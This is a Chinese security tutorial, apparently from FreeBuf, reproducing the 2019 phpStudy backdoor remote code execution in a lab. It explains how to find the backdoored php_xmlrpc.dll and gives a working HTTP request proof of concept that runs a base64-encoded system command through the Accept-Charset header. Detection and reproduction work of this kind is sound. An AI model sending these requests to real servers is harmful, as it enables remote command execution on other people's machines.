phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

各位FreeBuf观众的姥爷大家好，我是艾登——皮尔斯(玩看门狗时候注册的ID)，最近安全圈好不热闹，北京时间9月20日“杭州公安”官微发布了“杭州警方通报打击涉网违法犯罪暨’净网2019′专项行动战果”推文，该“后门”无法被杀毒软件扫描删除，并且藏匿于软件某功能性代码中，极难被发现具有免杀性质。严重的威胁到了互联网的空间安全，让大量的互联网网名的个人隐私信息遭到存在大面积泄露的风险，这篇文章分为图文教程和视频教程(文章末尾)。

文章目录:

1.phpstudy后门检测

2.phpstudy远程RCE后门复现图文教程

3.phpstudy远程RCE后门复现教视频程

3.Python编写复现脚本

4.Python编写批量复现脚本

5.针对部署phpstudy环境服务器已沦陷的主机进行溯源分析/黑客入侵画像

6.修复建议

7.参考

准备工具：

VMware Workstation Pro

Windows7的/ 2008R2

BurpSuiteFree

phpStudy20161103.zip（文中使用）phpStudy20180211.zip

Python

(1)phpStudy20161103 后门位置存在于：

*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll

*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll

(2)phpStudy20180211后门位置存在于：

*:PHPTutorialPHPPHP-5.2.17extphp_xmlrpc.dll

*:PHPTutorialPHPPHP-5.4.45extphp_xmlrpc.dll

(3)找到“ php_xmlrpc，dll”后用记事本打开，“ Ctrl + F”搜索“ @eva ”字符串如果存在就存在后门：

(4)Phpstudy后门分析文章传送门：

https://www.freebuf.com/news/topnews/214912.html

https://www.cppentry.com/bencandy.php?fid=85&id=261791

(1)虚拟机搭建好Phpstudy环境，我这里使用的是phpstudy2016版本

Phpstudy环境192.168.1.91

(2)浏览器访问靶机地址：http：//192.168.1.91/

(3)浏览器设置本地代理并且打开BurpSuiteFree抓包

(4)phpstudy RCE POC：

GET / HTTP/1.1

Host: 192.168.43.99

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset:”commandbase64 string”

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

(5)CTRL + R把请求包转发到中继器模块

Accept-Charset:”command base64 string”中执行命令经过了的的Base64编码加密：

执行语句指令：system(‘whoami’);

BASE64 编码后：c3lzdGVtKCd3aG9hbWknKTs =

替换进去

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

还要把“ ”中的前面的空格删除。Accept-Encoding: gzip, deflatedeflate

(6)构造好执行语句为WHOAMI的POC如下：

GET / HTTP/1.1

Host: 192.168.1.91

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0